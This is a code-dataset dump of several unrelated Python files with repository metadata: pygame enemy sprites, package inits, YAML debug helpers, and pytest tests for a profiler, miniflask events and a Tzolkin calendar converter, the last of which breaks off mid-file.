| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7117f93b498f378ecee7b37deabe0485e5cfbf46
| 4,643
|
py
|
Python
|
yaojikai/mypant/enemy.py
|
python20180319howmework/homework
|
c826d7aa4c52f8d22f739feb134d20f0b2c217cd
|
[
"Apache-2.0"
] | null | null | null |
yaojikai/mypant/enemy.py
|
python20180319howmework/homework
|
c826d7aa4c52f8d22f739feb134d20f0b2c217cd
|
[
"Apache-2.0"
] | null | null | null |
yaojikai/mypant/enemy.py
|
python20180319howmework/homework
|
c826d7aa4c52f8d22f739feb134d20f0b2c217cd
|
[
"Apache-2.0"
] | null | null | null |
import pygame
from random import *
class SmallEnemy(pygame.sprite.Sprite):
def __init__(self, screen):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("./images/enemy1.png").convert_alpha()
self.destroy_images = []
self.destroy_images.extend([\
pygame.image.load("./images/enemy1_down1.png").convert_alpha(), \
pygame.image.load("./images/enemy1_down2.png").convert_alpha(), \
pygame.image.load("./images/enemy1_down3.png").convert_alpha(), \
pygame.image.load("./images/enemy1_down4.png").convert_alpha() \
])
self.rect = self.image.get_rect()
self.width, self.height = 480, 700
self.speed = 2
self.active = True
self.rect.left, self.rect.top = \
randint(0, self.width - self.rect.width), \
randint(-5 * self.height, 0)
self.mask = pygame.mask.from_surface(self.image)
def move(self):
if self.rect.top < self.height:
self.rect.top += self.speed
else:
self.reset()
def reset(self):
self.active = True
self.rect.left, self.rect.top = \
randint(0, self.width - self.rect.width), \
randint(-5 * self.height, 0)
class MidEnemy(pygame.sprite.Sprite):
energy = 8
def __init__(self,screen):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("./images/enemy2.png").convert_alpha()
self.image_hit = pygame.image.load("./images/enemy2_hit.png").convert_alpha()
self.destroy_images = []
self.destroy_images.extend([\
pygame.image.load("./images/enemy2_down1.png").convert_alpha(), \
pygame.image.load("./images/enemy2_down2.png").convert_alpha(), \
pygame.image.load("./images/enemy2_down3.png").convert_alpha(), \
pygame.image.load("./images/enemy2_down4.png").convert_alpha() \
])
self.rect = self.image.get_rect()
self.width, self.height = 480, 700
self.speed = 1
self.active = True
self.rect.left, self.rect.top = \
randint(0, self.width - self.rect.width), \
randint(-10 * self.height, -self.height)
self.mask = pygame.mask.from_surface(self.image)
self.energy = MidEnemy.energy
self.hit = False
def move(self):
if self.rect.top < self.height:
self.rect.top += self.speed
else:
self.reset()
def reset(self):
self.active = True
self.energy = MidEnemy.energy
self.rect.left, self.rect.top = \
randint(0, self.width - self.rect.width), \
randint(-10 * self.height, -self.height)
class BigEnemy(pygame.sprite.Sprite):
energy = 20
def __init__(self, screen):
pygame.sprite.Sprite.__init__(self)
self.image1 = pygame.image.load("./images/enemy3_n1.png").convert_alpha()
self.image2 = pygame.image.load("./images/enemy3_n2.png").convert_alpha()
self.image_hit = pygame.image.load("./images/enemy3_hit.png").convert_alpha()
self.destroy_images = []
self.destroy_images.extend([\
pygame.image.load("./images/enemy3_down1.png").convert_alpha(), \
pygame.image.load("./images/enemy3_down2.png").convert_alpha(), \
pygame.image.load("./images/enemy3_down3.png").convert_alpha(), \
pygame.image.load("./images/enemy3_down4.png").convert_alpha(), \
pygame.image.load("./images/enemy3_down5.png").convert_alpha(), \
pygame.image.load("./images/enemy3_down6.png").convert_alpha() \
])
self.rect = self.image1.get_rect()
self.width, self.height = 480, 700
self.speed = 1
self.active = True
self.rect.left, self.rect.top = \
randint(0, self.width - self.rect.width), \
randint(-15 * self.height, -5 * self.height)
self.mask = pygame.mask.from_surface(self.image1)
self.energy = BigEnemy.energy
self.hit = False
def move(self):
if self.rect.top < self.height:
self.rect.top += self.speed
else:
self.reset()
def reset(self):
self.active = True
self.energy = BigEnemy.energy
self.rect.left, self.rect.top = \
randint(0, self.width - self.rect.width), \
randint(-15 * self.height, -5 * self.height)
| 37.747967
| 85
| 0.571398
| 547
| 4,643
| 4.711152
| 0.115174
| 0.083818
| 0.116414
| 0.16298
| 0.922002
| 0.864571
| 0.854094
| 0.854094
| 0.640667
| 0.615056
| 0
| 0.025316
| 0.285376
| 4,643
| 122
| 86
| 38.057377
| 0.751356
| 0
| 0
| 0.705882
| 0
| 0
| 0.103039
| 0.094848
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088235
| false
| 0
| 0.019608
| 0
| 0.156863
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
713a5c5920a183561878da2a9dd5b20faae575fc
| 94
|
py
|
Python
|
contrib/EzTemplate/Lib/__init__.py
|
xylar/cdat
|
8a5080cb18febfde365efc96147e25f51494a2bf
|
[
"BSD-3-Clause"
] | 62
|
2018-03-30T15:46:56.000Z
|
2021-12-08T23:30:24.000Z
|
contrib/EzTemplate/Lib/__init__.py
|
xylar/cdat
|
8a5080cb18febfde365efc96147e25f51494a2bf
|
[
"BSD-3-Clause"
] | 114
|
2018-03-21T01:12:43.000Z
|
2021-07-05T12:29:54.000Z
|
contrib/EzTemplate/Lib/__init__.py
|
CDAT/uvcdat
|
5133560c0c049b5c93ee321ba0af494253b44f91
|
[
"BSD-3-Clause"
] | 14
|
2018-06-06T02:42:47.000Z
|
2021-11-26T03:27:00.000Z
|
import vcsaddons
from vcsaddons.EzTemplate import Multi
from vcsaddons.EzTemplate import oneD
| 23.5
| 38
| 0.87234
| 12
| 94
| 6.833333
| 0.5
| 0.317073
| 0.560976
| 0.707317
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106383
| 94
| 3
| 39
| 31.333333
| 0.97619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
713abef86742a93710bac0615051c03ee515948d
| 263
|
py
|
Python
|
lib/yamlfuture/xxx.py
|
yaml/pyyaml-future
|
289983cbe8ffc49540fe2c02b2f118a46629146b
|
[
"MIT"
] | 1
|
2021-07-06T03:29:11.000Z
|
2021-07-06T03:29:11.000Z
|
lib/yamlfuture/xxx.py
|
yaml/pyyaml-future
|
289983cbe8ffc49540fe2c02b2f118a46629146b
|
[
"MIT"
] | null | null | null |
lib/yamlfuture/xxx.py
|
yaml/pyyaml-future
|
289983cbe8ffc49540fe2c02b2f118a46629146b
|
[
"MIT"
] | null | null | null |
def YYY(o):
import yaml
print(yaml.dump(o, explicit_start=True, explicit_end=True, sort_keys=False))
return o
def XXX(o):
import yaml
print(yaml.dump(o, explicit_start=True, explicit_end=True, sort_keys=False))
import sys
sys.exit(1)
| 23.909091
| 80
| 0.692015
| 43
| 263
| 4.093023
| 0.44186
| 0.079545
| 0.125
| 0.181818
| 0.795455
| 0.795455
| 0.795455
| 0.795455
| 0.795455
| 0.795455
| 0
| 0.004695
| 0.190114
| 263
| 10
| 81
| 26.3
| 0.821596
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.333333
| 0
| 0.666667
| 0.222222
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
a47afe6fa23b216f1b075eec5abffcc93b31f12e
| 217
|
py
|
Python
|
output/models/ms_data/identity_constraint/id_f029_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 1
|
2021-08-14T17:59:21.000Z
|
2021-08-14T17:59:21.000Z
|
output/models/ms_data/identity_constraint/id_f029_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 4
|
2020-02-12T21:30:44.000Z
|
2020-04-15T20:06:46.000Z
|
output/models/ms_data/identity_constraint/id_f029_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | null | null | null |
from output.models.ms_data.identity_constraint.id_f029_xsd.id_f029 import (
Root,
T,
)
from output.models.ms_data.identity_constraint.id_f029_xsd.id_f029a import R
__all__ = [
"Root",
"T",
"R",
]
| 18.083333
| 76
| 0.700461
| 33
| 217
| 4.181818
| 0.484848
| 0.130435
| 0.231884
| 0.26087
| 0.73913
| 0.73913
| 0.73913
| 0.73913
| 0.73913
| 0.73913
| 0
| 0.067416
| 0.179724
| 217
| 11
| 77
| 19.727273
| 0.707865
| 0
| 0
| 0
| 0
| 0
| 0.02765
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4a684080fa89a37c94e50538abe492660a03f8b
| 3,312
|
py
|
Python
|
tests/test_profiler.py
|
lizeyan/pyprof
|
d33168594ffabc628636858ae3873d092b2ba9e7
|
[
"MIT"
] | 6
|
2021-07-11T16:01:01.000Z
|
2022-02-10T05:59:30.000Z
|
tests/test_profiler.py
|
lizeyan/pyprof
|
d33168594ffabc628636858ae3873d092b2ba9e7
|
[
"MIT"
] | null | null | null |
tests/test_profiler.py
|
lizeyan/pyprof
|
d33168594ffabc628636858ae3873d092b2ba9e7
|
[
"MIT"
] | null | null | null |
import random
# noinspection PyProtectedMember
import time
import numpy as np
from concurrent.futures import ThreadPoolExecutor
from pyprof import clean, Profiler, report
from .test_utils import close
def test_snippet_context_manager():
clean()
# noinspection PyProtectedMember
from pyprof.pyprof import _root_profiler
assert _root_profiler.full_path == ""
p1 = Profiler("p1")
p2 = Profiler("p2")
p3 = Profiler("p3", p2)
p4 = Profiler("p4", p3)
assert p1.average == 0
assert p2.tail(10) == 0
assert Profiler("p1").full_path == "/p1"
assert p2.full_path == "/p2"
assert Profiler("p3", p2).full_path == "/p2/p3"
assert Profiler("p4", p3).full_path == "/p2/p3/p4"
assert set(p1._children) == set()
assert set(p2._children) == {p3}
assert set(p3._children) == {p4}
assert p4 == Profiler("p4", p3)
assert p4 is Profiler("p4", p3)
times = np.abs(np.random.normal(0.1, 0.01, 10))
with p3:
for t in times:
_ = random.random()
if _ <= 0.3:
p4.tic()
time.sleep(t)
p4.toc()
elif _ <= 0.5:
with p4:
time.sleep(t)
else:
p4(lambda: time.sleep(t))()
assert p4.count == len(times)
assert close(p4.average, np.mean(times).item())
assert close(p4.standard_deviation, np.std(times).item())
assert close(p4.max_time, np.max(times).item())
assert close(p4.tail(50), np.percentile(times, 50).item())
assert close(p4.tail(90), np.percentile(times, 90).item())
assert p3.total > np.sum(times)
assert p2._max_children_full_path_length() == 9
rpt = report()
print()
print(rpt)
assert len(rpt.splitlines()) == 5 + 1
assert str(_root_profiler) == '\n'.join(rpt.splitlines()[1:]) + '\n'
def test_multi_thread_profiler():
clean()
# noinspection PyProtectedMember
from pyprof.pyprof import _root_profiler
assert _root_profiler.full_path == ""
p1 = Profiler("p1")
p2 = Profiler("p2")
p3 = Profiler("p3", p2)
p4 = Profiler("p4", p3)
assert p1.average == 0
assert p2.tail(10) == 0
assert Profiler("p1").full_path == "/p1"
assert p2.full_path == "/p2"
assert Profiler("p3", p2).full_path == "/p2/p3"
assert Profiler("p4", p3).full_path == "/p2/p3/p4"
assert set(p1._children) == set()
assert set(p2._children) == {p3}
assert set(p3._children) == {p4}
assert p4 == Profiler("p4", p3)
assert p4 is Profiler("p4", p3)
times = np.abs(np.random.normal(0.1, 0.01, 10))
with p3:
with ThreadPoolExecutor(max_workers=8) as pool:
pool.map(p4(lambda t: time.sleep(t)), times)
assert p4.count == len(times)
assert close(p4.average, np.mean(times).item())
assert close(p4.standard_deviation, np.std(times).item())
assert close(p4.max_time, np.max(times).item())
assert close(p4.tail(50), np.percentile(times, 50).item())
assert close(p4.tail(90), np.percentile(times, 90).item())
assert p3.total < np.sum(times)
assert p2._max_children_full_path_length() == 9
rpt = report()
print()
print(rpt)
assert len(rpt.splitlines()) == 5 + 1
assert str(_root_profiler) == '\n'.join(rpt.splitlines()[1:]) + '\n'
| 32.470588
| 72
| 0.608092
| 462
| 3,312
| 4.244589
| 0.179654
| 0.048955
| 0.066293
| 0.069352
| 0.803672
| 0.803672
| 0.803672
| 0.803672
| 0.803672
| 0.803672
| 0
| 0.057526
| 0.233696
| 3,312
| 101
| 73
| 32.792079
| 0.71513
| 0.027778
| 0
| 0.758621
| 0
| 0
| 0.026741
| 0
| 0
| 0
| 0
| 0
| 0.505747
| 1
| 0.022989
| false
| 0
| 0.091954
| 0
| 0.114943
| 0.045977
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f105a4fdcb647f0f074bd85c14d8f39fa5c80b60
| 2,807
|
py
|
Python
|
tests/event/beforeafter/test_beforeafter.py
|
da-h/miniflask
|
d5e594153cca4ce4d30db01b1d06d05afa9e7aaa
|
[
"MIT"
] | 5
|
2020-02-17T12:14:36.000Z
|
2020-02-27T12:09:05.000Z
|
tests/event/beforeafter/test_beforeafter.py
|
da-h/miniflask
|
d5e594153cca4ce4d30db01b1d06d05afa9e7aaa
|
[
"MIT"
] | 69
|
2020-04-03T08:16:35.000Z
|
2021-12-21T15:46:29.000Z
|
tests/event/beforeafter/test_beforeafter.py
|
da-h/miniflask
|
d5e594153cca4ce4d30db01b1d06d05afa9e7aaa
|
[
"MIT"
] | 1
|
2020-04-02T15:46:39.000Z
|
2020-04-02T15:46:39.000Z
|
from pathlib import Path
import miniflask # noqa: E402
def test_beforeafter_setup(capsys):
mf = miniflask.init(
module_dirs=str(Path(__file__).parent / "modules"),
debug=True
)
mf.load("setup")
mf.parse_args([])
captured = capsys.readouterr()
mf.event.main()
captured = capsys.readouterr()
assert captured.out == """
event called with value: 42
event returned value: 42
""".lstrip()
def test_beforeafter_before(capsys):
mf = miniflask.init(
module_dirs=str(Path(__file__).parent / "modules"),
debug=True
)
mf.load(["setup", "beforeevent", "beforeevent2"])
mf.parse_args([])
captured = capsys.readouterr()
mf.event.main()
captured = capsys.readouterr()
assert captured.out == """
before_-event called
before_-event (2) called
event called with value: 85
event returned value: 85
""".lstrip()
def test_beforeafter_before_otherorder(capsys):
mf = miniflask.init(
module_dirs=str(Path(__file__).parent / "modules"),
debug=True
)
mf.load(["setup", "beforeevent2", "beforeevent"])
mf.parse_args([])
captured = capsys.readouterr()
mf.event.main()
captured = capsys.readouterr()
assert captured.out == """
before_-event (2) called
before_-event called
event called with value: 86
event returned value: 86
""".lstrip()
def test_beforeafter_after(capsys):
mf = miniflask.init(
module_dirs=str(Path(__file__).parent / "modules"),
debug=True
)
mf.load(["setup", "afterevent", "afterevent2"])
mf.parse_args([])
captured = capsys.readouterr()
mf.event.main()
captured = capsys.readouterr()
assert captured.out == """
event called with value: 42
after_-event called
after_-event (2) called
event returned value: 85
""".lstrip()
def test_beforeafter_after_otherorder(capsys):
mf = miniflask.init(
module_dirs=str(Path(__file__).parent / "modules"),
debug=True
)
mf.load(["setup", "afterevent2", "afterevent"])
mf.parse_args([])
captured = capsys.readouterr()
mf.event.main()
captured = capsys.readouterr()
assert captured.out == """
event called with value: 42
after_-event (2) called
after_-event called
event returned value: 86
""".lstrip()
def test_beforeafter_all(capsys):
mf = miniflask.init(
module_dirs=str(Path(__file__).parent / "modules"),
debug=True
)
mf.load(["setup", "beforeevent", "beforeevent2", "afterevent", "afterevent2"])
mf.parse_args([])
captured = capsys.readouterr()
mf.event.main()
captured = capsys.readouterr()
assert captured.out == """
before_-event called
before_-event (2) called
event called with value: 85
after_-event called
after_-event (2) called
event returned value: 171
""".lstrip()
| 25.288288
| 82
| 0.662985
| 334
| 2,807
| 5.386228
| 0.146707
| 0.093385
| 0.160089
| 0.070039
| 0.896609
| 0.856587
| 0.856587
| 0.856587
| 0.76876
| 0.76876
| 0
| 0.017723
| 0.195939
| 2,807
| 110
| 83
| 25.518182
| 0.779353
| 0.003563
| 0
| 0.765306
| 0
| 0
| 0.285868
| 0
| 0
| 0
| 0
| 0
| 0.061224
| 1
| 0.061224
| false
| 0
| 0.020408
| 0
| 0.081633
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f14cfdb772b4b909013a0dc01b721fafbd2e6547
| 40,919
|
py
|
Python
|
tests/test_tzolkin.py
|
Release-Candidate/tzolkin-calendar
|
6dc9722381adda22750988b09905d1da88fc1ed5
|
[
"MIT"
] | null | null | null |
tests/test_tzolkin.py
|
Release-Candidate/tzolkin-calendar
|
6dc9722381adda22750988b09905d1da88fc1ed5
|
[
"MIT"
] | 2
|
2021-03-23T21:59:05.000Z
|
2021-03-25T17:22:31.000Z
|
tests/test_tzolkin.py
|
Release-Candidate/tzolkin-calendar
|
6dc9722381adda22750988b09905d1da88fc1ed5
|
[
"MIT"
] | null | null | null |
# SPDX-License-Identifier: MIT
# Copyright (C) 2021 Roland Csaszar
#
# Project: tzolkin-calendar
# File: test_tzolkin.py
# Date: 21.Mar.2021
###############################################################################
"""Test tzolkin module."""
from __future__ import annotations
import datetime
import pytest
from hypothesis import given, settings
from hypothesis import strategies as st
from tzolkin_calendar import USED_DATEFMT, TzolkinDate, TzolkinException, day_names
from tzolkin_calendar.calculate import (
getTzolkinDay,
getTzolkinDiff,
lastTzolkin,
makeLookUpTable,
nextTzolkin,
tzolkin2gregorian,
)
from tzolkin_calendar.tzolkin import Tzolkin
# Using https://maya.nmai.si.edu/calendar/maya-calendar-converter
local_reference_dates = {
"01.01.1800": TzolkinDate(number=10, name=14),
"12.12.1926": TzolkinDate(number=4, name=19),
"26.01.1958": TzolkinDate(number=10, name=7),
"15.03.1967": TzolkinDate(number=4, name=2),
"01.01.1970": TzolkinDate(number=13, name=5),
"08.05.1975": TzolkinDate(number=3, name=18),
"17.02.1978": TzolkinDate(number=5, name=14),
"25.10.1986": TzolkinDate(number=5, name=6),
"13.05.1992": TzolkinDate(number=4, name=13),
"08.11.1997": TzolkinDate(number=7, name=18),
"01.01.2000": TzolkinDate(number=11, name=2),
"06.07.2005": TzolkinDate(number=9, name=15),
"01.10.2017": TzolkinDate(number=7, name=5),
"20.03.2021": TzolkinDate(number=12, name=11),
}
################################################################################
def test_TzolkinException1() -> None:
"""Test the constructor of `Tzolkin`, using a invalid day number."""
with pytest.raises(TzolkinException) as excp:
Tzolkin(number=17, name_number=7)
assert excp # nosec
################################################################################
def test_TzolkinException2() -> None:
"""Test the constructor of `Tzolkin`, using a invalid day name number."""
with pytest.raises(TzolkinException) as excp:
Tzolkin(number=6, name_number=27)
assert excp # nosec
################################################################################
def test_TzolkinException3() -> None:
"""Test the constructor of `Tzolkin`, using a invalid day name."""
with pytest.raises(TzolkinException) as excp:
Tzolkin(number=6, name_str="DOES NOT EXIST")
assert excp # nosec
################################################################################
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_fromDate(gregorian: str, tzolkin: TzolkinDate) -> None:
"""Test `Tzolkin.fromDate`."""
gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
to_test = Tzolkin.fromDate(gregorian_date)
assert to_test.getDayNumber() == tzolkin.number # nosec
assert to_test.getDayNameNumber() == tzolkin.name # nosec
################################################################################
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_fromDateConst(gregorian: str, tzolkin: TzolkinDate) -> None:
"""Test `Tzolkin`."""
gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
to_test = Tzolkin.fromDate(gregorian_date)
another = Tzolkin(number=tzolkin.number, name_str=day_names[tzolkin.name])
assert to_test.getDayNumber() == another.getDayNumber() # nosec
assert to_test.getDayNameNumber() == another.getDayNameNumber() # nosec
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_fromDateStr(gregorian: str, tzolkin: TzolkinDate) -> None:
"""Test `Tzolkin.fromDateString`."""
to_test = Tzolkin.fromDateString(date_str=gregorian, fmt=USED_DATEFMT)
assert to_test.getDayNumber() == tzolkin.number # nosec
assert to_test.getDayNameNumber() == tzolkin.name # nosec
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_fromIsoFormat(gregorian: str, tzolkin: TzolkinDate) -> None:
"""Test `Tzolkin.fromIsoFormat`."""
gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
to_test = Tzolkin.fromIsoFormat(date_str=gregorian_date.isoformat())
assert to_test.getDayNumber() == tzolkin.number # nosec
assert to_test.getDayNameNumber() == tzolkin.name # nosec
################################################################################
def test_fromToday() -> None:
"""Test `Tzolkin.fromToday`."""
assert ( # nosec
Tzolkin.fromToday().getDayName()
== Tzolkin.fromDate(date=datetime.date.today()).getDayName()
)
assert ( # nosec
Tzolkin.fromToday().getDayNumber()
== Tzolkin.fromDate(date=datetime.date.today()).getDayNumber()
)
################################################################################
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
pytest.param(
"01.01.2000", local_reference_dates["01.01.2000"], id="01.01.2000"
),
pytest.param(
"06.07.2005", local_reference_dates["06.07.2005"], id="06.07.2005"
),
pytest.param(
"01.10.2017", local_reference_dates["01.10.2017"], id="01.10.2017"
),
pytest.param(
"20.03.2021", local_reference_dates["20.03.2021"], id="20.03.2021"
),
],
)
def test_getTzolkinDate(gregorian: str, tzolkin: TzolkinDate) -> None:
"""Test `Tzolkin.getTzolkinDate`."""
gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
to_test = Tzolkin.fromDate(gregorian_date)
assert to_test.getTzolkinDate().number == tzolkin.number # nosec
assert to_test.getTzolkinDate().name == tzolkin.name # nosec
################################################################################
@pytest.mark.parametrize(
"gregorian,tzolkin",
[
pytest.param(
"01.01.1800", local_reference_dates["01.01.1800"], id="01.01.1800"
),
pytest.param(
"12.12.1926", local_reference_dates["12.12.1926"], id="12.12.1926"
),
pytest.param(
"26.01.1958", local_reference_dates["26.01.1958"], id="26.01.1958"
),
pytest.param(
"15.03.1967", local_reference_dates["15.03.1967"], id="15.03.1967"
),
pytest.param(
"01.01.1970", local_reference_dates["01.01.1970"], id="01.01.1970"
),
pytest.param(
"08.05.1975", local_reference_dates["08.05.1975"], id="08.05.1975"
),
pytest.param(
"17.02.1978", local_reference_dates["17.02.1978"], id="17.02.1978"
),
pytest.param(
"25.10.1986", local_reference_dates["25.10.1986"], id="25.10.1986"
),
pytest.param(
"13.05.1992", local_reference_dates["13.05.1992"], id="13.05.1992"
),
pytest.param(
"08.11.1997", local_reference_dates["08.11.1997"], id="08.11.1997"
),
